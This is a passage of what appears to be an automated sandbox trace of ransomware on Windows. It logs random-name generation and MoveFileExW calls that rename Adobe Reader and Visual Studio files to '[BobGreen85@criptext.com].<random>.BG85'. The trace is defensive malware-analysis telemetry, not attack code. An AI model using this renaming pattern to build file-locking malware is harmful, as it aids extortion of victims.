cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0076.264] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0076.264] GetTickCount () returned 0x114b5b9 [0076.264] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19660344079) returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0076.265] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0076.265] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\hanko.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\[BobGreen85@criptext.com].8DCGy5HI-Yaq0Q8KH.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\[bobgreen85@criptext.com].8dcgy5hi-yaq0q8kh.bg85"), dwFlags=0x1) returned 1 [0076.267] GetTickCount () returned 0x114b5c8 [0076.267] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19660562350) returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0076.267] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0076.267] GetTickCount () returned 0x114b5c8 [0076.268] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19660649530) returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0076.268] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0076.268] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\adobeid.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\[BobGreen85@criptext.com].qHxkUO2f-Zrn6JaWd.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\[bobgreen85@criptext.com].qhxkuo2f-zrn6jawd.bg85"), dwFlags=0x1) returned 1 [0076.609] GetTickCount () returned 0x114b710 [0076.609] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19694787655) returned 1 [0076.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0076.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0076.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0076.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0076.610] GetTickCount () returned 0x114b720 [0076.610] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19694886608) returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0076.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0076.611] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0076.611] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0076.611] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0076.611] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\[BobGreen85@criptext.com].Kl4gC722-efx5YVXs.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\[bobgreen85@criptext.com].kl4gc722-efx5yvxs.bg85"), dwFlags=0x1) returned 1 [0076.612] GetTickCount () returned 0x114b720 [0076.612] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19695116897) returned 1 [0076.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0076.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0076.613] GetTickCount () returned 0x114b720 [0076.613] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19695217653) returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0076.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0076.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0076.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0076.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0076.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0076.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0076.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0076.614] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\[BobGreen85@criptext.com].HyOOq9cP-FhqDlL7j.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\[bobgreen85@criptext.com].hyooq9cp-fhqdll7j.bg85"), dwFlags=0x1) returned 1 [0076.615] GetTickCount () returned 0x114b720 [0076.615] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19695442742) returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0076.616] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0076.616] GetTickCount () returned 0x114b720 [0076.616] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19695547157) returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0076.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0076.617] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\[BobGreen85@criptext.com].CcWAEdfC-PNQUbmH6.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\[bobgreen85@criptext.com].ccwaedfc-pnqubmh6.bg85"), dwFlags=0x1) returned 1 [0077.064] GetTickCount () returned 0x114b896 [0077.065] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19740351326) returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="I") returned 1 [0077.065] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0077.066] GetTickCount () returned 0x114b896 [0077.066] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19740468940) returned 1 [0077.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0077.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0077.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0077.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0077.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0077.066] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0077.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0077.067] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0077.067] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\[BobGreen85@criptext.com].mPBj0tIY-ND8NqoVr.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\[bobgreen85@criptext.com].mpbj0tiy-nd8nqovr.bg85"), dwFlags=0x1) returned 1 [0077.068] GetTickCount () returned 0x114b896 [0077.069] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=19740757669) returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0077.069] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0077.070] GetTickCount () returned 0x114b896 [0077.070] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=19740868562) returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="P") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0077.070] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, 